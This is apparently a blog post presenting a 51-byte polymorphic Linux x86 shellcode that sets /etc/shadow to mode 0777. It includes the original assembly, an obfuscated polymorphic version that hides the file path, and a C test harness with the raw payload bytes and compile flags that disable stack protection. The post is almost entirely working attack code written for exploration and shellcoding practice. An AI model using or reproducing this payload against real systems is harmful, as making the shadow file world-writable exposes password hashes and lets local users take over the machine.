Chmod 0777 Polymorphic Shellcode

This is my first hand written shellcode for linux which I wrote it for fun and exploration. I am a bit new to shellcoding in *nix environments. This shellcode changes the permission of the shadow file in linux/x86 system to 0777. According to the Linux programmer’s manual of chmod it takes two arguments.
[code language=”c”]
#include <sys/stat.h>

int chmod(const char *path, mode_t mode);
[/code]

The char pointer path needs to be our path to the file and the mode needs is our file permissions. We need to calculate it by ORing the permissions. Since we need to set it to 0777 which is the octal value, the hexadecimal value is 1FF. This is my original assembly code. According to the x86 syscall table the value for chmod is 15.

[code language=”c”]
section .text
global _start

_start:
xor eax,eax
push dword eax
push dword 0x776f6461
push dword 0x68732f63
push dword 0x74652f2f
mov ebx, esp
push word 0x1ff
pop cx
mov al,0xf
int 0x80
[/code]

This is my polymorphic version in which I have changed the original code retaining the functionality.

[code language=”c”]
; Title: chmod 0777 /etc/shadow Polymorphic Shellcode – 51 Bytes
; Platform: linux/x86
; Date: 2014-06-22
; Author: Osanda Malith Jayathissa (@OsandaMalith)

section .text
global _start

_start:
mov ebx, eax
xor eax, ebx
push dword eax
mov esi, 0x563a1f3e
add esi, 0x21354523
mov dword [esp-4], esi
mov dword [esp-8], 0x68732f2f
mov dword [esp-12], 0x6374652f
sub esp, 12
mov ebx,esp
push word 0x1ff
pop cx
mov al,0xf
int 0x80

[/code]

This is the C skeleton file in which you can test. Compile giving -fno-stack-protector and -z execstack arguments to gcc to make it execute.

[code language=”C”]
/*
; Title: chmod 0777 /etc/shadow Polymorphic Shellcode – 51 Bytes
; Platform: linux/x86
; Date: 2014-06-22
; Author: Osanda Malith Jayathissa (@OsandaMalith)

section .text
global _start

_start:
mov ebx, eax
xor eax, ebx
push dword eax
mov esi, 0x563a1f3e
add esi, 0x21354523
mov dword [esp-4], esi
mov dword [esp-8], 0x68732f2f
mov dword [esp-12], 0x6374652f
sub esp, 12
mov ebx,esp
push word 0x1ff
pop cx
mov al,0xf
int 0x80

*/

#include <stdio.h>
#include <string.h>

unsigned char code[] = \
"\x89\xc3\x31\xd8\x50\xbe\x3e\x1f"
"\x3a\x56\x81\xc6\x23\x45\x35\x21"
"\x89\x74\x24\xfc\xc7\x44\x24\xf8"
"\x2f\x2f\x73\x68\xc7\x44\x24\xf4"
"\x2f\x65\x74\x63\x83\xec\x0c\x89"
"\xe3\x66\x68\xff\x01\x66\x59\xb0"
"\x0f\xcd\x80";

int
main() {

printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();

return 0;
}
[/code]

http://packetstormsecurity.com/files/127180/Linux-x86-chmod-0777-etc-shadow-Polymorphic-Shellcode.html

One thought on “Chmod 0777 Polymorphic Shellcode

Leave a Reply to NightNashoCancel reply